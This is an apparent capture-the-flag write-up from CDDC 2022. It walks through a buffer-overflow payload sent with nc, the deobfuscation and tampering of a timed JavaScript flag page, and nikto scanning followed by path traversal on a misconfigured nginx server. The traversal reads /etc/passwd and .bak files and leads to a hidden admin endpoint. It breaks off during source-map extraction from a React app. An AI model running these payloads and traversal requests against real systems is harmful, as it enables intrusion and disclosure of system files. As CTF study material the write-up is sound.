└─$ gdb overwriteme
GNU gdb (Debian 10.1-2+b1) 10.1.90.20210103-git
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.                                   
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from overwriteme...
(No debugging symbols found in overwriteme)
(gdb) run </tmp/t
Starting program: /home/hacker/Stuff/cddc2022/overwriteme </tmp/t
Key : Login Successful!
                                                                                        Program received signal SIGSEGV, Segmentation fault.

0x00000a0000400837 in ?? ()
(gdb) q

┌──(kali㉿localhost)-[~/Documents/cddc2022]
└─$ python3 -c "print('weakpass\x00'+'A'*15+'\x37\x08\x40\x00\x00\x00\x00\x00')" | nc 18.141.181.118 7013
Key : Login Successful!
flag : CDDC22{Funct10n_4ddress_Overw1ted_@H_!}

┌──(kali㉿localhost)-[~/Documents/cddc2022]
└─$

CDDC22{Funct10n\_4ddress\_Overw1ted\_@H\_!}

Pwn - Unintialised

I lost my writeup stuff, but basically

login using password weakpass
Read flag from file to variable using the 3rd option
Read flag from variable using 4th option

Ring 4

Web - JS more

Firstly, I tried reading the source code of the webpage file given

┌──(kali㉿localhost)-[~/Documents/cddc2022]
└─$ cat js_more.html
<html>
<head>
    <meta charset='utf-8'>
    <title>Execute ME?</title>
    <style>
        body{background-color:#000000;color:#ffffff;font-weight:bold;font-size:30px}.main{text-align:center;margin-top:40vh}.flag{text-align:center;background-image:linear-gradient(90deg,red,yellow,green,blue,purple);-webkit-background-clip:text;color:transparent;font-weight:bold;font-size:40px;margin:0px 15vw}
    </style>
</head>
<body>
    <div class="main">
        The Flag is<br />
    </div>
    <script>
        var _0x1201f9=_0x1a3a;(function(_0x5cb7d3,_0x27d23f){var _0x5eb7a1=_0x1a3a,_0x21409f=_0x5cb7d3();while(!![]){try{var _0x5e597b=-parseInt(_0x5eb7a1(0xee))/0x1+parseInt(_0x5eb7a1(0xef))/0x2*(-parseInt(_0x5eb7a1(0xeb))/0x3)+-parseInt(_0x5eb7a1(0xe7))/0x4*(parseInt(_0x5eb7a1(0xe4))/0x5)+-parseInt(_0x5eb7a1(0xe5))/0x6*(parseInt(_0x5eb7a1(0xf8))/0x7)+-parseInt(_0x5eb7a1(0xe8))/0x8*(parseInt(_0x5eb7a1(0xf4))/0x9)+-parseInt(_0x5eb7a1(0xe2))/0xa*(-parseInt(_0x5eb7a1(0xf0))/0xb)+-parseInt(_0x5eb7a1(0xf5))/0xc*(-parseInt(_0x5eb7a1(0xe1))/0xd);if(_0x5e597b===_0x27d23f)break;else _0x21409f['push'](_0x21409f['shift']());}catch(_0x25f023){_0x21409f['push'](_0x21409f['shift']());}}}(_0x5d00,0x60c52));function fa(_0x407309,_0xac7f0e){var _0x199c6b=_0x1a3a,_0x1fb69f='';for(var _0x301dc4=0x0;_0x301dc4<_0x407309[_0x199c6b(0xf1)];_0x301dc4++){_0x1fb69f+=String[_0x199c6b(0xf9)](_0x407309[_0x301dc4]['charCodeAt']()^_0xac7f0e%0x80);}return _0x1fb69f;}function _0x5d00(){var _0xe6d298=['Btoa','717866rOhIoX','2iUmMYl','16753HTOfbk','length','\x0aThe\x20Flag\x20is<br>','hover','52011QIGRor','6876byriEV','CDDC','main','129213UdXdci','fromCharCode','44707REhrQw','10NLXoNi','getElementsByClassName','10qafWGT','18ivdefL','<div\x20class=\x27flag\x27>','970936XpWFIH','424KAmkcF','</div>','encode','32106HGwwAO','TWNGTU0mRVNVQkIiTiVWYE1jQVZFUkJOcnpweFZBVkBNUnhNQnklY016YH12U15+dlVBVVMmQk5BUk5hVkMhO0JMXnZWQ1Z9TFJec0NCfEJ2c0ZRQUNebE5FbGFWQmw7QXpWfUFTWnNWQUJCQ0wgVXZ5XnlMTGB6cXlefk1BRVZ2U15VTSVCTkZSZH5DQlZhdkNVUnAlQnNWVUJnTUxOIE0lfHdFQ15jTUIhflZ6JFpBUn9aQSVebU5/RkVNRVJ9dlNRWlZTJW1MY2x9Q3khRk5TUlFNQ15xVUNac01jUk1NUnh9TUMgUVVCZH13J01VQXNOdlwmbE5DUUJzVlVSck1jTiZNJnBOVUJaeExjQlJOUiBSTlJOTkFcLWB3f1Z8cSZad015cHJ2emRCTVVCJ015XVJBeUZ9UEMhf3clbHBNJ1JRQSZ3U0FsYCJNc1JSdnlRUlVTWnNQVUZHVkVCQk14fHlFeUZNVUFWQkNDXVFyRUFScVNGenF5JXpMeV4gTXpeeUElTk1VRUJnQ0JWRk5cUlFWeVptRlwtInd/RmFxJl5hdnl3UlVDWn5NeHwjTSV4dlBMYHpBXEJ6TVJ8VkJ4eH1xemdSRVxSI01BRmBOJXh3TUNsTkFSUkJNJWd2cXlaRXZ5WnJVQmB4QHNCJ056UiZOU05yRVJCRU1zUmxNJlVWVlNaTU16LXlNJVZuTnpsd0ZTbHxFUlJnVkVCP0JzTkVNJnBxTGNCQ0BzUn5NU1lWcnladUxSTn5DQlpxTSdeTUFMZH1MUl55Q1NOYU1VcHlDeV5jVVVsYXdzQjt2elJVQyVWc1ZCXn5McyVyTXhzVVBTVmdQQyVgclJadUJDbH1wJlpuRlwtekNDTkNOU1laTCZsckZcWmdDRWNydlJ4TUJDRmxGXHx9dydOfkJMWVZCQyVsTnpaek15IT9CfyFQUEJBUkVSWn1MJEZWdkxaeXFSQmNQTFpnVnNSfE5CLW1CeSVxTFZgfncnQVJyRUJ8UFNaTlBBUmBMeU53dlItVVZcZ1FNeFpCd3NCV05VcHdBQkJNTGNsYUNTQVlNUng/dnlacU14QnlWRSV1cUNBXldFKSk='];_0x5d00=function(){return _0xe6d298;};return _0x5d00();}function fb(_0xcd3d66,_0x1414b5){return _0x1414b5%0x1f4==0x0&&(_0xcd3d66=atob(_0xcd3d66)),_0xcd3d66=fa(_0xcd3d66,_0x1414b5),_0xcd3d66;}function _0x1a3a(_0x558caf,_0x498ad9){var _0x5d005c=_0x5d00();return _0x1a3a=function(_0x1a3a7e,_0x46c4d8){_0x1a3a7e=_0x1a3a7e-0xe1;var _0x37da4c=_0x5d005c[_0x1a3a7e];return _0x37da4c;},_0x1a3a(_0x558caf,_0x498ad9);}function fc(_0x2f5e4d){var _0x4ea9f2=_0x1a3a;_0x2f5e4d=_0x4ea9f2(0xf2)+_0x2f5e4d+'\x0a',document[_0x4ea9f2(0xe3)](_0x4ea9f2(0xf7))[0x0]['innerHTML']=_0x2f5e4d;}var a='Array',b=_0x1201f9(0xed),c=_0x1201f9(0xf6),d=_0x1201f9(0xec),e=_0x1201f9(0xea),f='',g='',h=_0x1201f9(0xf3),i=0x1388,j=0x0,k=0x0,l=0x0,m=0x3,n=0x2,record=setInterval(function(){g='',j=l%0xa;if(j<0x5)for(k=0x0;k<j;k++){g=g+'.\x20';}else for(k=0x0;k<0xa-j;k++){g=g+'.\x20';}fc(g),l++;},0x3e8);d=atob(d);var decode=setInterval(function(){var _0x17ca40=_0x1201f9;i--,d=fb(d,i),i==0x0&&(clearTimeout(record),clearTimeout(decode),fc(_0x17ca40(0xe6)+d+_0x17ca40(0xe9)));},0xea60);
    </script>
</body>
</html>
┌──(kali㉿localhost)-[~/Documents/cddc2022]
└─$

The javascript code looks obfuscated, so i deobfuscated it using https://deobfuscate.io/. The interesting parts of the code is the setInterval (record and decode variables). If i trigger it ahead of time (by modifying the code directly), I could show the flag earlier then the 3 days needed to wait for it.

var _0x1201f9 = _0x1a3a;
(function (_0x5cb7d3, _0x27d23f) {
  var _0x5eb7a1 = _0x1a3a, _0x21409f = _0x5cb7d3();
  while (true) {
    try {
      var _0x5e597b = -parseInt(_0x5eb7a1(238)) / 1 + parseInt(_0x5eb7a1(239)) / 2 * (-parseInt(_0x5eb7a1(235)) / 3) + -parseInt(_0x5eb7a1(231)) / 4 * (parseInt(_0x5eb7a1(228)) / 5) + -parseInt(_0x5eb7a1(229)) / 6 * (parseInt(_0x5eb7a1(248)) / 7) + -parseInt(_0x5eb7a1(232)) / 8 * (parseInt(_0x5eb7a1(244)) / 9) + -parseInt(_0x5eb7a1(226)) / 10 * (-parseInt(_0x5eb7a1(240)) / 11) + -parseInt(_0x5eb7a1(245)) / 12 * (-parseInt(_0x5eb7a1(225)) / 13);
      if (_0x5e597b === _0x27d23f) break; else _0x21409f.push(_0x21409f.shift());
    } catch (_0x25f023) {
      _0x21409f.push(_0x21409f.shift());
    }
  }
}(_0x5d00, 396370));
function fa(_0x407309, _0xac7f0e) {
  var _0x199c6b = _0x1a3a, _0x1fb69f = "";
  for (var _0x301dc4 = 0; _0x301dc4 < _0x407309[_0x199c6b(241)]; _0x301dc4++) {
    _0x1fb69f += String[_0x199c6b(249)](_0x407309[_0x301dc4].charCodeAt() ^ _0xac7f0e % 128);
  }
  return _0x1fb69f;
}
function _0x5d00() {
  var _0xe6d298 = ["Btoa", "717866rOhIoX", "2iUmMYl", "16753HTOfbk", "length", "\nThe Flag is<br>", "hover", "52011QIGRor", "6876byriEV", "CDDC", "main", "129213UdXdci", "fromCharCode", "44707REhrQw", "10NLXoNi", "getElementsByClassName", "10qafWGT", "18ivdefL", "<div class='flag'>", "970936XpWFIH", "424KAmkcF", "</div>", "encode", "32106HGwwAO", "TWNGTU0mRVNVQkIiTiVWYE1jQVZFUkJOcnpweFZBVkBNUnhNQnklY016YH12U15+dlVBVVMmQk5BUk5hVkMhO0JMXnZWQ1Z9TFJec0NCfEJ2c0ZRQUNebE5FbGFWQmw7QXpWfUFTWnNWQUJCQ0wgVXZ5XnlMTGB6cXlefk1BRVZ2U15VTSVCTkZSZH5DQlZhdkNVUnAlQnNWVUJnTUxOIE0lfHdFQ15jTUIhflZ6JFpBUn9aQSVebU5/RkVNRVJ9dlNRWlZTJW1MY2x9Q3khRk5TUlFNQ15xVUNac01jUk1NUnh9TUMgUVVCZH13J01VQXNOdlwmbE5DUUJzVlVSck1jTiZNJnBOVUJaeExjQlJOUiBSTlJOTkFcLWB3f1Z8cSZad015cHJ2emRCTVVCJ015XVJBeUZ9UEMhf3clbHBNJ1JRQSZ3U0FsYCJNc1JSdnlRUlVTWnNQVUZHVkVCQk14fHlFeUZNVUFWQkNDXVFyRUFScVNGenF5JXpMeV4gTXpeeUElTk1VRUJnQ0JWRk5cUlFWeVptRlwtInd/RmFxJl5hdnl3UlVDWn5NeHwjTSV4dlBMYHpBXEJ6TVJ8VkJ4eH1xemdSRVxSI01BRmBOJXh3TUNsTkFSUkJNJWd2cXlaRXZ5WnJVQmB4QHNCJ056UiZOU05yRVJCRU1zUmxNJlVWVlNaTU16LXlNJVZuTnpsd0ZTbHxFUlJnVkVCP0JzTkVNJnBxTGNCQ0BzUn5NU1lWcnladUxSTn5DQlpxTSdeTUFMZH1MUl55Q1NOYU1VcHlDeV5jVVVsYXdzQjt2elJVQyVWc1ZCXn5McyVyTXhzVVBTVmdQQyVgclJadUJDbH1wJlpuRlwtekNDTkNOU1laTCZsckZcWmdDRWNydlJ4TUJDRmxGXHx9dydOfkJMWVZCQyVsTnpaek15IT9CfyFQUEJBUkVSWn1MJEZWdkxaeXFSQmNQTFpnVnNSfE5CLW1CeSVxTFZgfncnQVJyRUJ8UFNaTlBBUmBMeU53dlItVVZcZ1FNeFpCd3NCV05VcHdBQkJNTGNsYUNTQVlNUng/dnlacU14QnlWRSV1cUNBXldFKSk="];
  _0x5d00 = function () {
    return _0xe6d298;
  };
  return _0x5d00();
}
function _0x1a3a(_0x558caf, _0x498ad9) {
  var _0x5d005c = _0x5d00();
  return _0x1a3a = function (_0x1a3a7e, _0x46c4d8) {
    _0x1a3a7e = _0x1a3a7e - 225;
    var _0x37da4c = _0x5d005c[_0x1a3a7e];
    return _0x37da4c;
  }, _0x1a3a(_0x558caf, _0x498ad9);
}
function fc(_0x2f5e4d) {
  var _0x4ea9f2 = _0x1a3a;
  _0x2f5e4d = _0x4ea9f2(242) + _0x2f5e4d + "\n", document[_0x4ea9f2(227)](_0x4ea9f2(247))[0].innerHTML = _0x2f5e4d;
}
var a = "Array", b = _0x1201f9(237), c = _0x1201f9(246), d = _0x1201f9(236), e = _0x1201f9(234), f = "", g = "", h = _0x1201f9(243), i = 5e3, j = 0, k = 0, l = 0, m = 3, n = 2, record = setInterval(function () {
  g = "", j = l % 10;
  if (j < 5) for (k = 0; k < j; k++) {
    g = g + ". ";
  } else for (k = 0; k < 10 - j; k++) {
    g = g + ". ";
  }
  fc(g), l++;
}, 1e3);
d = atob(d);
var decode = setInterval(function () {
  var _0x17ca40 = _0x1201f9;
  i--, d = (i % 500 == 0 && (d = atob(d)), d = fa(d, i), d), i == 0 && (clearTimeout(record), clearTimeout(decode), fc(_0x17ca40(230) + d + _0x17ca40(233)));
}, 6e4);

Modified the code to

Reduce the decode timeout
Remove fg(g) function call from the record timeout

┌──(kali㉿localhost)-[~/Documents/cddc2022]
└─$ cp js_more.html js_more.mod.html

┌──(kali㉿localhost)-[~/Documents/cddc2022]
└─$ nano js_more.mod.html

┌──(kali㉿localhost)-[~/Documents/cddc2022]
└─$ cat js_more.mod.html
<html>
<head>
    <meta charset='utf-8'>
    <title>Execute ME?</title>
    <style>
        body{background-color:#000000;color:#ffffff;font-weight:bold;font-size:30px}.main{text-align:center;margin-top:40vh}.flag{text-align:center;background-image:linear-gradient(90deg,red,yellow,green,blue,purple);-webkit-background-clip:text;color:transparent;font-weight:bold;font-size:40px;margin:0px 15vw}
    </style>
</head>
<body>
    <div class="main">
        The Flag is<br />
    </div>
    <script>
        var _0x1201f9=_0x1a3a;(function(_0x5cb7d3,_0x27d23f){var _0x5eb7a1=_0x1a3a,_0x21409f=_0x5cb7d3();while(!![]){try{var _0x5e597b=-parseInt(_0x5eb7a1(0xee))/0x1+parseInt(_0x5eb7a1(0xef))/0x2*(-parseInt(_0x5eb7a1(0xeb))/0x3)+-parseInt(_0x5eb7a1(0xe7))/0x4*(parseInt(_0x5eb7a1(0xe4))/0x5)+-parseInt(_0x5eb7a1(0xe5))/0x6*(parseInt(_0x5eb7a1(0xf8))/0x7)+-parseInt(_0x5eb7a1(0xe8))/0x8*(parseInt(_0x5eb7a1(0xf4))/0x9)+-parseInt(_0x5eb7a1(0xe2))/0xa*(-parseInt(_0x5eb7a1(0xf0))/0xb)+-parseInt(_0x5eb7a1(0xf5))/0xc*(-parseInt(_0x5eb7a1(0xe1))/0xd);if(_0x5e597b===_0x27d23f)break;else _0x21409f['push'](_0x21409f['shift']());}catch(_0x25f023){_0x21409f['push'](_0x21409f['shift']());}}}(_0x5d00,0x60c52));function fa(_0x407309,_0xac7f0e){var _0x199c6b=_0x1a3a,_0x1fb69f='';for(var _0x301dc4=0x0;_0x301dc4<_0x407309[_0x199c6b(0xf1)];_0x301dc4++){_0x1fb69f+=String[_0x199c6b(0xf9)](_0x407309[_0x301dc4]['charCodeAt']()^_0xac7f0e%0x80);}return _0x1fb69f;}function _0x5d00(){var _0xe6d298=['Btoa','717866rOhIoX','2iUmMYl','16753HTOfbk','length','\x0aThe\x20Flag\x20is<br>','hover','52011QIGRor','6876byriEV','CDDC','main','129213UdXdci','fromCharCode','44707REhrQw','10NLXoNi','getElementsByClassName','10qafWGT','18ivdefL','<div\x20class=\x27flag\x27>','970936XpWFIH','424KAmkcF','</div>','encode','32106HGwwAO','TWNGTU0mRVNVQkIiTiVWYE1jQVZFUkJOcnpweFZBVkBNUnhNQnklY016YH12U15+dlVBVVMmQk5BUk5hVkMhO0JMXnZWQ1Z9TFJec0NCfEJ2c0ZRQUNebE5FbGFWQmw7QXpWfUFTWnNWQUJCQ0wgVXZ5XnlMTGB6cXlefk1BRVZ2U15VTSVCTkZSZH5DQlZhdkNVUnAlQnNWVUJnTUxOIE0lfHdFQ15jTUIhflZ6JFpBUn9aQSVebU5/RkVNRVJ9dlNRWlZTJW1MY2x9Q3khRk5TUlFNQ15xVUNac01jUk1NUnh9TUMgUVVCZH13J01VQXNOdlwmbE5DUUJzVlVSck1jTiZNJnBOVUJaeExjQlJOUiBSTlJOTkFcLWB3f1Z8cSZad015cHJ2emRCTVVCJ015XVJBeUZ9UEMhf3clbHBNJ1JRQSZ3U0FsYCJNc1JSdnlRUlVTWnNQVUZHVkVCQk14fHlFeUZNVUFWQkNDXVFyRUFScVNGenF5JXpMeV4gTXpeeUElTk1VRUJnQ0JWRk5cUlFWeVptRlwtInd/RmFxJl5hdnl3UlVDWn5NeHwjTSV4dlBMYHpBXEJ6TVJ8VkJ4eH1xemdSRVxSI01BRmBOJXh3TUNsTkFSUkJNJWd2cXlaRXZ5WnJVQmB4QHNCJ056UiZOU05yRVJCRU1zUmxNJlVWVlNaTU16LXlNJVZuTnpsd0ZTbHxFUlJnVkVCP0JzTkVNJnBxTGNCQ0BzUn5NU1lWcnladUxSTn5DQlpxTSdeTUFMZH1MUl55Q1NOYU1VcHlDeV5jVVVsYXdzQjt2elJVQyVWc1ZCXn5McyVyTXhzVVBTVmdQQyVgclJadUJDbH1wJlpuRlwtekNDTkNOU1laTCZsckZcWmdDRWNydlJ4TUJDRmxGXHx9dydOfkJMWVZCQyVsTnpaek15IT9CfyFQUEJBUkVSWn1MJEZWdkxaeXFSQmNQTFpnVnNSfE5CLW1CeSVxTFZgfncnQVJyRUJ8UFNaTlBBUmBMeU53dlItVVZcZ1FNeFpCd3NCV05VcHdBQkJNTGNsYUNTQVlNUng/dnlacU14QnlWRSV1cUNBXldFKSk='];_0x5d00=function(){return _0xe6d298;};return _0x5d00();}function fb(_0xcd3d66,_0x1414b5){return _0x1414b5%0x1f4==0x0&&(_0xcd3d66=atob(_0xcd3d66)),_0xcd3d66=fa(_0xcd3d66,_0x1414b5),_0xcd3d66;}function _0x1a3a(_0x558caf,_0x498ad9){var _0x5d005c=_0x5d00();return _0x1a3a=function(_0x1a3a7e,_0x46c4d8){_0x1a3a7e=_0x1a3a7e-0xe1;var _0x37da4c=_0x5d005c[_0x1a3a7e];return _0x37da4c;},_0x1a3a(_0x558caf,_0x498ad9);}function fc(_0x2f5e4d){var _0x4ea9f2=_0x1a3a;_0x2f5e4d=_0x4ea9f2(0xf2)+_0x2f5e4d+'\x0a',document[_0x4ea9f2(0xe3)](_0x4ea9f2(0xf7))[0x0]['innerHTML']=_0x2f5e4d;}var a='Array',b=_0x1201f9(0xed),c=_0x1201f9(0xf6),d=_0x1201f9(0xec),e=_0x1201f9(0xea),f='',g='',h=_0x1201f9(0xf3),i=0x1388,j=0x0,k=0x0,l=0x0,m=0x3,n=0x2,record=setInterval(function(){g='',j=l%0xa;if(j<0x5)for(k=0x0;k<j;k++){g=g+'.\x20';}else for(k=0x0;k<0xa-j;k++){g=g+'.\x20';}l++;},0x3e8);d=atob(d);var decode=setInterval(function(){var _0x17ca40=_0x1201f9;i--,d=fb(d,i),i==0x0&&(clearTimeout(record),clearTimeout(decode),fc(_0x17ca40(0xe6)+d+_0x17ca40(0xe9)));},0x01);
    </script>
</body>
</html>

┌──(kali㉿localhost)-[~/Documents/cddc2022]
└─$

After that just wait for less than a min for the flag to show up

CDDC22{Th1s\_is\_FLAG\_4ft3r\_tHe\_c0mpeT1tI0n;->}

Web - Test Page

Test Site

This challenge mainly asks you to find the vulnerability in the nginx server.

Out on a whim, I ran nikto, a web vulnerability scanner, on the webpage. This got me some interesting results, most notably

You can access /etc/passwd
There is a /test directory, which lists the contents inside. However, the .bak files are unaccessible

┌──(kali㉿localhost)-[~]
└─$ nikto -h http://54.255.223.3:7777/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          54.255.223.3
+ Target Hostname:    54.255.223.3
+ Target Port:        7777
+ Start Time:         2022-06-22 09:06:00 (GMT0)
---------------------------------------------------------------------------
+ Server: nginx/1.21.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://54.255.223.3:7777/index.html
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to / over HTTP/1.0. The value is "172.18.0.3".
+ ///etc/passwd: The server install allows reading of any system file by adding an extra '/' to the URL.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-3268: /test/: Directory indexing found.
+ OSVDB-3092: /test/: This might be interesting...
+ OSVDB-3092: /etc/passwd: An '/etc/passwd' file is available via the web site.
+ 7917 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2022-06-22 09:15:51 (GMT0) (591 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

┌──(kali㉿localhost)-[~]
└─$

Test to access /etc/passwd

┌──(kali㉿localhost)-[~]
└─$ curl http://54.255.223.3:7777/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
nginx:x:101:101:nginx user,,,:/nonexistent:/bin/false

┌──(kali㉿localhost)-[~]
└─$

Accessing the /test endpoint

┌──(kali㉿localhost)-[~]
└─$ curl http://54.255.223.3:7777/test/
<html>
<head><title>Index of /test/</title></head>
<body>
<h1>Index of /test/</h1><hr><pre><a href="../">../</a>
<a href="files/">files/</a>                                             20-May-2022 02:40                   -
<a href="static/">static/</a>                                            20-May-2022 02:40                   -
</pre><hr></body>
</html>

┌──(kali㉿localhost)-[~]
└─$ curl http://54.255.223.3:7777/test/files/
<html>
<head><title>Index of /test/files/</title></head>
<body>
<h1>Index of /test/files/</h1><hr><pre><a href="../">../</a>
<a href="1.bak">1.bak</a>                                              19-May-2022 12:33                 523
<a href="2.bak">2.bak</a>                                              19-May-2022 12:33                 512
</pre><hr></body>
</html>

┌──(kali㉿localhost)-[~]
└─$ curl http://54.255.223.3:7777/test/files/1.bak
<html>
<head><title>403 Forbidden</title></head>
<body>
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.21.1</center>
</body>
</html>

┌──(kali㉿localhost)-[~]
└─$ curl http://54.255.223.3:7777/test/files/2.bak
<html>
<head><title>403 Forbidden</title></head>
<body>
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.21.1</center>
</body>
</html>

┌──(kali㉿localhost)-[~]
└─$

Since you could access /etc/passwd, I was thinking if you could access files from the root directory (provided the nginx user can access it). I tried accessing the nginx configuration file at /etc/nginx/nginx.conf (Common location)

┌──(kali㉿localhost)-[~]
└─$ curl http://54.255.223.3:7777/etc/nginx/nginx.conf
user nginx;

events {
  worker_connections 512;
}

http {
  server {
    listen 7777;

    location / {
      root /;
      try_files /usr/share/nginx/html/$uri $uri @go;
    }

    location @go {
      return 302 /index.html;
    }

    location /test {
      autoindex on;
      alias /usr/share/nginx/html/test/;

      location /test/static {
        alias /usr/share/nginx/html/test/static/;
      }

      location /test/files/ {
        location ~* .(bak)$ {
          return 403;
        }
      }
    }

    location /h1dd3n-3ndp01nt {
      rewrite /h1dd3n-3ndp01nt/(.*) /$1 break;
      proxy_pass http://internal-server:8888;
    }
  }
}
┌──(kali㉿localhost)-[~]
└─$

This nginx config file shows a few things

The root of the web server is / of the file system. This confirms that you can read all files from root provided the nginx user has the proper permissions
/test endpoint on the webserver is /usr/share/nginx/html/test/ on the file system
- The .bak files is only blocked through the /test/files/ endpoint
There is a /h1dd3n-3ndp01nt which directs request to an internal server

To access the .bak files, instead of using the /test/ endpoint, we could traverse to the files from root.

┌──(kali㉿localhost)-[~]
└─$ curl http://54.255.223.3:7777/usr/share/nginx/html/test/files/1.bak
user nginx;

events {
  worker_connections 512;
}

http {
  server {
    listen 7777;

    location / {
      root /;
      try_files /usr/share/nginx/html/$uri $uri @go;
    }

    location @go {
      return 302 /index.html;
    }

    location /test {
      autoindex on;
      alias /usr/share/nginx/html/test/;

      location /test/static {
        alias /usr/share/nginx/html/test/static/;
      }

      location /test/files/ {
        location ~* .(bak)$ {
          return 403;
        }
      }
    }
...
...
...
┌──(kali㉿localhost)-[~]
└─$ 
┌──(kali㉿localhost)-[~]
└─$ curl http://54.255.223.3:7777/usr/share/nginx/html/test/files/2.bak
package main

import (
        "fmt"
        "log"
        "net/http"
        "os"

        "github.com/gorilla/mux"
)

func handlePing(w http.ResponseWriter, r *http.Request) {
        fmt.Fprint(w, "pong")
}

func handleAdmin(w http.ResponseWriter, r *http.Request) {
        w.Header().Set("Flag", os.Getenv("FLAG"))
}

func main() {
        r := mux.NewRouter()
        r.HandleFunc("/ping", handlePing).Methods(http.MethodGet)
        r.HandleFunc("/admin", handleAdmin).Methods(http.MethodPut)

        if err := http.ListenAndServe(":8888", r); err != nil {
                log.Fatalln(err)
        }
}

┌──(kali㉿localhost)-[~]
└─$

The first .bak file looks like a backup nginx configuration file. The second looks like the code to the hidden endpoint, where we can access the flag by giving a PUT endpoint to the /admin endpoint

I then tried to access the endpoint.

┌──(kali㉿localhost)-[~]
└─$ curl http://54.255.223.3:7777/h1dd3n-3ndp01nt/admin -X PUT  -v
*   Trying 54.255.223.3:7777...
* Connected to 54.255.223.3 (54.255.223.3) port 7777 (#0)
> PUT /h1dd3n-3ndp01nt/admin HTTP/1.1
> Host: 54.255.223.3:7777
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: nginx/1.21.1
< Date: Wed, 22 Jun 2022 10:54:13 GMT
< Content-Length: 0
< Connection: keep-alive
< Flag: CDDC22{dlrjtdmsvmfformdlqslek.gotjrgoehdkandmlaldjqtdjdy~answpvnfdjwntutjrkatkgkqslek!}
<
* Connection #0 to host 54.255.223.3 left intact

┌──(kali㉿localhost)-[~]
└─$

CDDC22{dlrjtdmsvmfformdlqslek.gotjrgoehdkandmlaldjqtdjdy~answpvnfdjwntutjrkatkgkqslek!}

Ring 3

Web - SPA

This is a challenge asking you to login to the administrator account.

In web development terms, SPA stands for Single Page Application. This means that the entire webpage & code is loaded all at once. The code is generally bundled in a single file or a similar method using something like webpack.

On loading the webapp, the icon for the webpage is React, suggesting that it uses React (A Javascript Framework mainly for Single Page Applications), and it is an SPA. The Web page then asks you to login.

My first thought was to Google on how to get the source code from SPAs. This lead me to https://github.com/rarecoil/unwebpack-sourcemap, a tool to get the source code from SPAs bundled using webpack (like React Apps).

┌──(kali㉿localhost)-[~]
└─$ cd Documents/cddc2022/unwebpack-sourcemap/
.git/                   README.md               unwebpack_sourcemap.py
.gitignore              example-react-ts-app/
LICENSE                 requirements.txt
┌──(kali㉿localhost)-[~]
└─$ cd Documents/cddc2022/unwebpack-sourcemap/

┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap]
└─$ mkdir output

┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap]
└─$ --detect "--detect "http://localhost:3000/" output^Coutput

┌──(kali㉿localhost)-[~/Documents/cddc2022/unwebpack-sourcemap]
└─$ ./unwebpack_sourcemap.py --detect "http://54.254.185.105:5959/#/login" output
Detecting sourcemaps in HTML at http://54.254.185.105:5959/#/login
Detected sourcemap at remote location http://54.254.185.105:5959/static/js/bundle.js.map
Detected sourcemap at remote location http://54.254.185.105:5959/static/js/0.chunk.js.map
Detected sourcemap at remote location http://54.254.185.105:5959/static/js/main.chunk.js.map
Writing bootstrap...
Writing extends.js...
Writing index.js...
Writing index.js...
Writing xhr.js...
Writing axios.js...
Writing Cancel.js...
Writing CancelToken.js...
Writing isCancel.js...
Writing Axios.js...
Writing InterceptorManager.js...
Writing buildFullPath.js...
Writing createError.js...
Writing dispatchRequest.js...
Writing enhanceError.js...
Writing mergeConfig.js...
Writing settle.js...
Writing transformData.js...
Writing defaults.js...
Writing bind.js...
Writing buildURL.js...
Writing combineURLs.js...
Writing cookies.js...
Writing isAbsoluteURL.js...
Writing isAxiosError.js...
Writing isURLSameOrigin.js...
Writing normalizeHeaderName.js...
Writing parseHeaders.js...
Writing spread.js...
Writing utils.js...
Writing arrayWithHoles.js...
Writing assertThisInitialized.js...
Writing classCallCheck.js...
Writing createClass.js...
Writing defineProperty.js...
Writing getPrototypeOf.js...
Writing inherits.js...
Writing objectWithoutProperties.js...
Writing objectWithoutPropertiesLoose.js...
Writing possibleConstructorReturn.js...
Writing setPrototypeOf.js...
Writing typeof.js...
Writing iterableToArrayLimit.js...
Writing nonIterableRest.js...
Writing slicedToArray.js...
Writing index.js...
Writing templates.js...
Writing conversions.js...
